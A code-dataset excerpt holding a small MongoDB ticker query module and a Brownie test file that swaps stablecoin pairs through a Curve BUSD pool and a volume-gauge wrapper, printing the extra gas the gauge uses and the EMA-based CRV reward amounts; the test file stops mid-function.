7a3ba95f424b0a709ad1caa7fbd3d2386b69f7b6
|
[
"MIT"
] | null | null | null |
db/ticker.py
|
CryptoInsights/query
|
7a3ba95f424b0a709ad1caa7fbd3d2386b69f7b6
|
[
"MIT"
] | null | null | null |
db/ticker.py
|
CryptoInsights/query
|
7a3ba95f424b0a709ad1caa7fbd3d2386b69f7b6
|
[
"MIT"
] | null | null | null |
from .mongo import db
def get_all_tickers():
return db.coins.find()
| 12.333333
| 26
| 0.702703
| 12
| 74
| 4.166667
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189189
| 74
| 5
| 27
| 14.8
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
d72848d601a54da00c28d38fd56b6414b98bb83d
| 36,010
|
py
|
Python
|
tests/test_08_busdvolgauge.py
|
taariq/volumegauge
|
f92ea90f4eefab9079fd624bddbe0e3cf5684f80
|
[
"Apache-2.0"
] | 3
|
2020-12-17T01:11:08.000Z
|
2020-12-24T08:06:07.000Z
|
tests/test_08_busdvolgauge.py
|
taariq/volumegauge
|
f92ea90f4eefab9079fd624bddbe0e3cf5684f80
|
[
"Apache-2.0"
] | 13
|
2020-11-22T20:24:23.000Z
|
2021-01-07T20:19:57.000Z
|
tests/test_08_busdvolgauge.py
|
taariq/volumegauge
|
f92ea90f4eefab9079fd624bddbe0e3cf5684f80
|
[
"Apache-2.0"
] | 3
|
2020-12-17T18:32:46.000Z
|
2020-12-23T21:57:47.000Z
|
#!/usr/bin/python3
import pytest
PERIOD = 30
DENOMINATOR = 10 ** 18
SMOOTHING = 2
ALPHA = DENOMINATOR - SMOOTHING * DENOMINATOR / (PERIOD + 1)
def test_exchange_ydai_to_yusdc(_busdvolgauge, busdpool, yDAI_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yDAI_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yDAI_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdc_to_ydai(_busdvolgauge, busdpool, yUSDC_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDC_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDC_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ydai_to_yusdt(_busdvolgauge, busdpool, yDAI_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yDAI_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yDAI_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdt_to_ydai(_busdvolgauge, busdpool, yUSDT_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDT_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDT_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ydai_to_ybusd(_busdvolgauge, busdpool, yDAI_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yDAI_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yDAI_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ybusd_to_ydai(_busdvolgauge, busdpool, yBUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yBUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yBUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdc_to_yusdt(_busdvolgauge, busdpool, yUSDC_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDC_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDC_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdt_to_yusdc(_busdvolgauge, busdpool, yUSDT_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDT_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDT_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdc_to_ybusd(_busdvolgauge, busdpool, yUSDC_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDC_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDC_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ybusd_to_yusdc(_busdvolgauge, busdpool, yBUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yBUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yBUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdt_to_ybusd(_busdvolgauge, busdpool, yUSDT_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(2, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(2, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDT_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDT_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ybusd_to_yusdt(_busdvolgauge, busdpool, yBUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(3, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(3, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yBUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yBUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_dai_to_usdc(_busdvolgauge, busdpool, DAI, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(DAI)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(DAI)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdc_to_dai(_busdvolgauge, busdpool, USDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_dai_to_usdt(_busdvolgauge, busdpool, DAI, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(DAI)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(DAI)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdt_to_dai(_busdvolgauge, busdpool, USDT, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDT)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDT)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_dai_to_busd(_busdvolgauge, busdpool, DAI, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(DAI)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(DAI)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_busd_to_dai(_busdvolgauge, busdpool, BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdc_to_usdt(_busdvolgauge, busdpool, USDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdt_to_usdc(_busdvolgauge, busdpool, USDT, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDT)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDT)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdc_to_busd(_busdvolgauge, busdpool, USDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
